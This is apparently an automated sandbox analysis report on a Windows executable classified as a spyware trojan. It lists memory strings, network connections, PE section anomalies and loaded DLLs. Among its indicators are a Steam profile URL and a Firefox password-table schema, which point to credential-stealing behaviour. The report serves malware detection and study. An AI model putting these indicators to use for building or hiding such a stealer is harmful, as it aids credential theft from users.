                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptc8
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: MaZjv5XeQi.exe, 00000000.00000003.2182887020.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49715 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: MaZjv5XeQi.exeStatic PE information: section name:
                Source: MaZjv5XeQi.exeStatic PE information: section name: .idata
                Source: MaZjv5XeQi.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_010040BB0_3_010040BB
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009E04600_2_009E0460
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009DC5A00_2_009DC5A0
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009AE6870_2_009AE687
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009A86000_2_009A8600
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009E0D200_2_009E0D20
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009D8EA00_2_009D8EA0
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009ACE450_2_009ACE45
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009AB1000_2_009AB100
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009D92800_2_009D9280
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009B12270_2_009B1227
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009CD34A0_2_009CD34A
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009C74400_2_009C7440
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009B57C00_2_009B57C0
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009C1D000_2_009C1D00
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_00AAC0AA0_2_00AAC0AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009CC09E0_2_009CC09E
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_00ADA0B60_2_00ADA0B6
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_00A580870_2_00A58087
                Source: MaZjv5XeQi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: MaZjv5XeQi.exeStatic PE information: Section: ZLIB complexity 0.9995021446078431
                Source: MaZjv5XeQi.exeStatic PE information: Section: buspngqz ZLIB complexity 0.9949199654369081
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@12/3
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134882751.0000000005749000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2135229307.000000000572E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MaZjv5XeQi.exeReversingLabs: Detection: 63%
                Source: MaZjv5XeQi.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile read: C:\Users\user\Desktop\MaZjv5XeQi.exeJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: amsi.dllJump to behavior
